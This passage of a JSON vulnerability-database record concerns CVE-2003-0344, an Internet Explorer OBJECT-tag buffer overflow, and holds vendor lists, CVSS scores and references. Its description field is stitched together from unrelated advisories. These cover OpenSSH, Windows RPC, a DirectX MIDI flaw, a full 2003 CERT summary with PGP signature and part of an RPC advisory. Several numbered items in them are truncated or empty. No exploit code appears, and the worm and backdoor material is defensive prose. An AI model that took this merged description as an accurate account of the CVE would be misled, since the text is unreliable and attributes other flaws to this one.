"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6"
},
{
"model": "windows server 2003",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "internet explorer sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.5"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Derek Soeder\u203b dsoeder@eeye.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0344",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/severity#"
},
"@id": "https://www.variotdbs.pl/ref/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2003-0344",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2003-0344",
"trust": 1.8,
"value": "High"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#813208",
"trust": 0.8,
"value": "3.65"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#326746",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#561284",
"trust": 0.8,
"value": "29.84"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#679556",
"trust": 0.8,
"value": "17.47"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#334928",
"trust": 0.8,
"value": "7.09"
},
{
"author": "CNNVD",
"id": "CNNVD-200306-069",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft\u0027s Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. A Microsoft Windows DirectX library, quartz.dll, does not properly validate certain parameters in Musical Instrument Digital Interface (MIDI) files. A remotely exploitable vulnerability has been discovered in Internet Explorer. A remote attacker could execute arbitrary code with the privileges of the user running IE. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. Description\n\n Microsoft Windows operating systems include multimedia technologies\n called DirectX and DirectShow. From Microsoft Security Bulletin\n MS03-030, \"DirectX consists of a set of low-level Application\n Programming Interfaces (APIs) that are used by Windows programs for\n multimedia support. \n\n Any application that uses DirectX/DirectShow to process MIDI files may\n be affected by this vulnerability. Of particular concern, Internet\n Explorer (IE) uses the Windows Media Player ActiveX control and\n quartz.dll to handle MIDI files embedded in HTML documents. An\n attacker could therefore exploit this vulnerability by convincing a\n victim to view an HTML document, such as a web page or an HTML email\n message, that contains an embedded MIDI file. 
Note that in addition to\n IE, a number of applications, including Outlook, Outlook Express,\n Eudora, AOL, Lotus Notes, and Adobe PhotoDeluxe, use the WebBrowser\n ActiveX control to interpret HTML documents. \n\n Further technical details are available in eEye Digital Security\n advisory AD20030723. Common Vulnerabilities and Exposures (CVE) refers\n to these vulnerabilities as CAN-2003-0346. \n\nDisable embedded MIDI files\n\n Change the Run ActiveX controls and plug-ins security setting to\n Disable in the Internet zone and the zone(s) used by Outlook, Outlook\n Express, and any other application that uses the WebBrowser ActiveX\n control to render HTML. This modification will prevent MIDI files from\n being automatically loaded from HTML documents. This workaround is not\n a complete solution and will not prevent attacks that attempt to load\n MIDI files directly. \n\n Instructions for modifying IE security zone settings can be found in\n the CERT/CC Malicious Web Scripts FAQ. References\n\n * CERT/CC Vulnerability Note VU#561284 -\n http://www.kb.cert.org/vuls/id/561284\n * CERT/CC Vulnerability Note VU#265232 -\n http://www.kb.cert.org/vuls/id/265232\n * eEye Digital Security advisory AD20030723 -\n http://www.eeye.com/html/Research/Advisories/AD20030723.html\n * Microsoft Security Bulletin MS03-030 -\n http://microsoft.com/technet/security/bulletin/MS03-030.asp\n * Microsoft Knowledge Base article 819696 -\n http://support.microsoft.com/default.aspx?scid=kb;en-us;819696\n _________________________________________________________________\n\n These vulnerabilities were researched and reported by eEye Digital\n Security. \n _________________________________________________________________\n\n Feedback can be directed to the author, Art Manion. 
\n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Summary CS-2003-04\n\n November 24, 2003\n\n Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT\n Summary to draw attention to the types of attacks reported to our\n incident response team, as well as other noteworthy incident and\n vulnerability information. The summary includes pointers to sources of\n information for dealing with the problems. \n\n Past CERT summaries are available from:\n\n CERT Summaries\n http://www.cert.org/summaries/\n ______________________________________________________________________\n\nRecent Activity\n\n Since the last regularly scheduled CERT summary, issued in September\n 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft\n Windows Workstation Service, RPCSS Service, and Exchange. \n\n For more current information on activity being reported to the\n CERT/CC, please visit the CERT/CC Current Activity page. The Current\n Activity page is a regularly updated summary of the most frequent,\n high-impact types of security incidents and vulnerabilities being\n reported to the CERT/CC. The information on the Current Activity page\n is reviewed and updated as reporting trends change. \n\n CERT/CC Current Activity\n http://www.cert.org/current/current_activity.html\n\n\n 1. W32/Mimail Variants\n\n The CERT/CC has received reports of several new variants of the\n \u0027Mimail\u0027 worm. The most recent variant of the worm (W32/Mimail.J)\n arrives as an email message alleging to be from the Paypal\n financial service. The message requests that the recipient\n \u0027verify\u0027 their account information to prevent the suspension of\n their Paypal account. Attached to the email is an executable file\n which captures this information (if entered), and sends it to a\n number of email addresses. \n\n Current Activity - November 19, 2003\n http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili\n\n\n 2. 
\n\n CERT Advisory CA-2003-28\n\t\tBuffer Overflow in Windows Workstation Service\n http://www.cert.org/advisories/CA-2003-28.html\n\n Vulnerability Note VU#567620\n\t\tMicrosoft Windows Workstation service vulnerable to \n\t\tbuffer overflow when sent specially crafted network\n\t\tmessage\n http://www.kb.cert.org/vuls/id/567620\n\n\n 3. \n\n CERT Advisory CA-2003-27\n\t\tMultiple Vulnerabilities in Microsoft Windows and \n\t\tExchange\n http://www.cert.org/advisories/CA-2003-27.html\n\n Vulnerability Note VU#575892\n\t\tBuffer overflow in Microsoft Windows Messenger Service\n http://www.kb.cert.org/vuls/id/575892\n\n Vulnerability Note VU#422156\n\t\tMicrosoft Exchange Server fails to properly handle\n\t\tspecially crafted SMTP extended verb requests\n http://www.kb.cert.org/vuls/id/422156\n\n Vulnerability Note VU#467036\n\t\tMicrosoft Windows Help and support Center contains buffer\n\t\toverflow in code used to handle HCP protocol\n http://www.kb.cert.org/vuls/id/467036\n\n Vulnerability Note VU#989932\n\t\tMicrosoft Windows contains buffer overflow in Local \n\t\tTroubleshooter ActiveX control (Tshoot.ocx)\n http://www.kb.cert.org/vuls/id/989932\n\n Vulnerability Note VU#838572\n\t\tMicrosoft Windows Authenticode mechanism installs ActiveX\n\t\tcontrols without prompting user\n http://www.kb.cert.org/vuls/id/838572\n\n Vulnerability Note VU#435444\n\t\tMicrosoft Outlook Web Access (OWA) contains cross-site\n\t\tscripting vulnerability in the \"Compose New Message\" form\n http://www.kb.cert.org/vuls/id/435444\n\n Vulnerability Note VU#967668\n\t\tMicrosoft Windows ListBox and ComboBox controls vulnerable\n\t\tto buffer overflow when supplied crafted Windows message\n http://www.kb.cert.org/vuls/id/967668\n\n\n 4. 
Multiple Vulnerabilities in SSL/TLS Implementations\n\n Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)\n and Transport Layer Security (TLS) protocols allowing an attacker\n to execute arbitrary code or cause a denial-of-service condition. \n\n CERT Advisory CA-2003-26\n\t\tMultiple Vulnerabilities in SSL/TLS Implementations\n http://www.cert.org/advisories/CA-2003-26.html\n\n Vulnerability Note VU#935264\n\t\tOpenSSL ASN.1 parser insecure memory deallocation\n http://www.kb.cert.org/vuls/id/935264\n\n Vulnerability Note VU#255484\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (1)\n http://www.kb.cert.org/vuls/id/255484\n\n Vulnerability Note VU#380864\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (2)\n http://www.kb.cert.org/vuls/id/380864\n\n Vulnerability Note VU#686224\n\t\tOpenSSL does not securely handle invalid public key when\n\t\tconfigured to ignore errors\n http://www.kb.cert.org/vuls/id/686224\n\n Vulnerability Note VU#732952\n\t\tOpenSSL accepts unsolicited client certificate messages\n http://www.kb.cert.org/vuls/id/732952\n\n Vulnerability Note VU#104280\n\t\tMultiple vulnerabilities in SSL/TLS implementations\n http://www.kb.cert.org/vuls/id/104280\n\n Vulnerability Note VU#412478\n\t\tOpenSSL 0.9.6k does not properly handle ASN.1 sequences\n http://www.kb.cert.org/vuls/id/412478\n\n\n 5. These attacks include the\n installation of tools for launching distributed denial-of-service\n (DDoS) attacks, providing generic proxy services, reading\n sensitive information from the Windows registry, and using a\n victim system\u0027s modem to dial pay-per-minute services. The\n vulnerability described in VU#865940 exists due to an interaction\n between IE\u0027s MIME type processing and the way it handles HTML\n application (HTA) files embedded in OBJECT tags. 
W32/Swen.A Worm\n\n On September 19, the CERT/CC began receiving a large volume of\n reports of a mass mailing worm, referred to as W32/Swen.A,\n spreading on the Internet. Similar to W32/Gibe.B in function, this\n worm arrives as an attachment claiming to be a Microsoft Internet\n Explorer Update or a delivery failure notice from qmail. The\n W32/Swen.A worm requires a user to execute the attachment either\n manually or by using an email client that will open the attachment\n automatically. Upon opening the attachment, the worm attempts to\n mail itself to all email addresses it finds on the system. The\n CERT/CC updated the current activity page to contain further\n information on this worm. \n\n Current Activity - September 19, 2003\n http://www.cert.org/current/archive/2003/09/19/archive.html#swena\n\n\n 7. Buffer Overflow in Sendmail\n\n Sendmail, a widely deployed mail transfer agent (MTA), contains a\n vulnerability that could allow an attacker to execute arbitrary\n code with the privileges of the sendmail daemon, typically root. \n\n CERT Advisory CA-2003-25\n\t\tBuffer Overflow in Sendmail\n http://www.cert.org/advisories/CA-2003-25.html\n\n Vulnerability Note VU#784980\n\t\tSendmail prescan() buffer overflow vulnerability\n http://www.kb.cert.org/vuls/id/784980\n\n\n 8. RPCSS Vulnerabilities in Microsoft Windows\n\n On September 10, the CERT/CC reported on three vulnerabilities\n that affect numerous versions of Microsoft Windows, two of which\n are remotely exploitable buffer overflows that may an allow an\n attacker to execute code with system privileges. 
\n\n CERT Advisory CA-2003-23\n\t\tRPCSS Vulnerabilities in Microsoft Windows\n http://www.cert.org/advisories/CA-2003-23.html\n\n Vulnerability Note VU#483492\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM activation routines\n http://www.kb.cert.org/vuls/id/483492\n\n Vulnerability Note VU#254236\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM request filename handling\n http://www.kb.cert.org/vuls/id/254236\n\n Vulnerability Note VU#326746\n\t\tMicrosoft Windows RPC service vulnerable to \n\t\tdenial of service\n http://www.kb.cert.org/vuls/id/326746\n ______________________________________________________________________\n\nNew CERT Coordination Center (CERT/CC) PGP Key\n\n On October 15, the CERT/CC issued a new PGP key, which should be used\n when sending sensitive information to the CERT/CC. \n\n CERT/CC PGP Public Key\n https://www.cert.org/pgp/cert_pgp_key.asc\n\n Sending Sensitive Information to the CERT/CC\n https://www.cert.org/contact_cert/encryptmail.html\n ______________________________________________________________________\n\nWhat\u0027s New and Updated\n\n Since the last CERT Summary, we have published new and updated\n * Advisories\n http://www.cert.org/advisories/\n * Vulnerability Notes\n http://www.kb.cert.org/vuls\n * CERT/CC Statistics\n http://www.cert.org/stats/cert_stats.html\n * Congressional Testimony\n http://www.cert.org/congressional_testimony\n * Training Schedule\n http://www.cert.org/training/\n * CSIRT Development\n http://www.cert.org/csirts/\n ______________________________________________________________________\n\n This document is available from:\n http://www.cert.org/summaries/CS-2003-04.html\n ______________________________________________________________________\n\nCERT/CC Contact Information\n\n Email: cert@cert.org\n Phone: +1 412-268-7090 (24-hour hotline)\n Fax: +1 412-268-6989\n Postal address:\n CERT Coordination Center\n Software Engineering Institute\n Carnegie 
Mellon University\n Pittsburgh PA 15213-3890\n U.S.A. \n\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\n during other hours, on U.S. holidays, and on weekends. \n\nUsing encryption\n\n We strongly urge you to encrypt sensitive information sent by email. \n Our public PGP key is available from\n http://www.cert.org/CERT_PGP.key\n\n If you prefer to use DES, please call the CERT hotline for more\n information. \n\nGetting security information\n\n CERT publications and other security information are available from\n our web site\n http://www.cert.org/\n\n To subscribe to the CERT mailing list for advisories and bulletins,\n send email to majordomo@cert.org. Please include in the body of your\n message\n\n subscribe cert-advisory\n\n * \"CERT\" and \"CERT Coordination Center\" are registered in the U.S. \n Patent and Trademark Office. \n ______________________________________________________________________\n\n NO WARRANTY\n Any material furnished by Carnegie Mellon University and the Software\n Engineering Institute is furnished on an \"as is\" basis. Carnegie\n Mellon University makes no warranties of any kind, either expressed or\n implied as to any matter including, but not limited to, warranty of\n fitness for a particular purpose or merchantability, exclusivity or\n results obtained from use of the material. Carnegie Mellon University\n does not make any warranty of any kind with respect to freedom from\n patent, trademark, or copyright infringement. \n ______________________________________________________________________\n\n Conditions for use, disclaimers, and sponsorship information\n\n Copyright \\xa92003 Carnegie Mellon University. 
\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 6.5.8\n\niQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78\n7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT\nrb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU\nUENALuNdthA=\n=DD60\n-----END PGP SIGNATURE-----\n. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC\nInterface\n\n Original issue date: July 31, 2003\n Last revised: -\n Source: CERT/CC\n\n A complete revision history is at the end of this file. \n\nI. Known exploits target TCP port 135 and create a\n privileged backdoor command shell on successfully compromised hosts. \n Some versions of the exploit use TCP port 4444 for the backdoor, and\n other versions use a TCP port number specified by the intruder at\n run-time. We have also received reports of scanning activity for\n common backdoor ports such as 4444/TCP. In some cases, due to the RPC\n service terminating, a compromised system may reboot after the\n backdoor is accessed by an intruder. Based on\n current information, we believe this vulnerability is separate and\n independent from the RPC vulnerability addressed in MS03-026. The\n CERT/CC is tracking this additional vulnerability as VU#326746 and is\n continuing to work to understand the issue and mitigation strategies. \n\n In both of the attacks described above, a TCP session to port 135 is\n used to execute the attack. However, access to TCP ports 139 and 445\n may also provide attack vectors and should be considered when applying\n mitigation strategies. \n\nII. \n\nIII. Solutions\n\nApply patches\n\n All users are encouraged to apply the patches referred to in Microsoft\n Security Bulletin MS03-026 as soon as possible in order to mitigate\n the vulnerability described in VU#568148. These patches are also\n available via Microsoft\u0027s Windows Update service. 
\n\n Systems running Windows 2000 may still be vulnerable to at least a\n denial of service attack via VU#326746 if their DCOM RPC service is\n available via the network. Therefore, sites are encouraged to use the\n packet filtering tips below in addition to applying the patches\n supplied in MS03-026. \n\nFilter network traffic\n\n Sites are encouraged to block network access to the RPC service at\n network borders. This can minimize the potential of denial-of-service\n attacks originating from outside the perimeter. The specific services\n that should be blocked include\n * 135/TCP\n * 135/UDP\n * 139/TCP\n * 139/UDP\n * 445/TCP\n * 445/UDP\n\n If access cannot be blocked for all external hosts, the CERT/CC\n recommends limiting access to only those hosts that require it for\n normal operation. As a general rule, the CERT/CC recommends filtering\n all types of network traffic that are not required for normal\n operation. \n\n Because current exploits for VU#568148 create a backdoor, which is in\n some cases 4444/TCP, blocking inbound TCP sessions to ports on which\n no legitimate services are provided may limit intruder access to\n compromised hosts. \n\nRecovering from a system compromise\n\n If you believe a system under your administrative control has been\n compromised, please follow the steps outlined in\n\n Steps for Recovering from a UNIX or NT System Compromise\n\nReporting\n\n The CERT/CC is tracking activity related to exploitation of the first\n vulnerability (VU#568148) as CERT#27479 and the second vulnerability\n (VU#326746) as CERT#24523. Relevant artifacts or activity can be sent\n to cert@cert.org with the appropriate CERT# in the subject line. \n\nAppendix A. Vendor Information\n\n This appendix contains information provided by vendors. If a vendor is not listed below, we\n have not received their comments. \n\nMicrosoft\n\n Please see Microsoft Security Bulletin MS03-026. \n\nAppendix B",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0344"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
}
],
"trust": 6.48
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#679556",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2003-0344",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "8943",
"trust": 2.4
},
{
"db": "BID",
"id": "7806",
"trust": 1.9
},
{
"db": "CERT/CC",
"id": "VU#813208",
"trust": 1.1
},
{
"db": "CERT/CC",
"id": "VU#334928",
"trust": 1.1
},
{
"db": "CERT/CC",
"id": "VU#326746",
"trust": 1.0
},
{
"db": "CERT/CC",
"id": "VU#561284",
"trust": 1.0
},
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "XF",
"id": "12970",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "VU#265232",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#784980",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#575892",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#254236",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#255484",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#865940",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#467036",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#380864",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#838572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#422156",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#412478",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#935264",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#686224",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#483492",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#104280",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#567620",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#989932",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#967668",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#435444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#732952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32268",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31490",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"id": "VAR-200306-0042",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2022-05-08T07:26:52.746000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS03-032",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-032.asp"
},
{
"title": "MS03-020",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-020.asp"
},
{
"title": "MS03-032",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.mspx"
},
{
"title": "MS03-020",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms03-020.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://www.eeye.com/html/research/advisories/ad20030604.html"
},
{
"trust": 2.4,
"url": "http://www.kb.cert.org/vuls/id/679556"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/7806"
},
{
